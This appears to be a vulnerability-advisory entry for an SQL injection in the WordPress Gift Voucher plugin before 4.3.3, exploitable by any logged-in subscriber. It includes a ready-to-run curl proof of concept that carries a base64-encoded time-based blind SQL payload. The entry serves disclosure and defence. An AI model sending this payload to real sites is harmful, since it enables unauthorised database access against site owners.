Lucene search

K
wpexploitWpvulndbWPEX-ID:7AD59661-B43C-42FC-8575-4039312AB0B3
HistoryMar 22, 2023 - 12:00 a.m.

Gift Voucher < 4.3.3 - Subscriber+ SQLi

2023-03-2200:00:00
wpvulndb
78
gift voucher
sql injection
admin-ajax

0.012 Low

EPSS

Percentile

85.2%

The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying_for=&for=&from=&value=&message=&code=&shipping=&shipping_email=&firstname=&lastname=&email=&address=&pincode=&shipping_method=&paymentmethod="

0.012 Low

EPSS

Percentile

85.2%

Related for WPEX-ID:7AD59661-B43C-42FC-8575-4039312AB0B3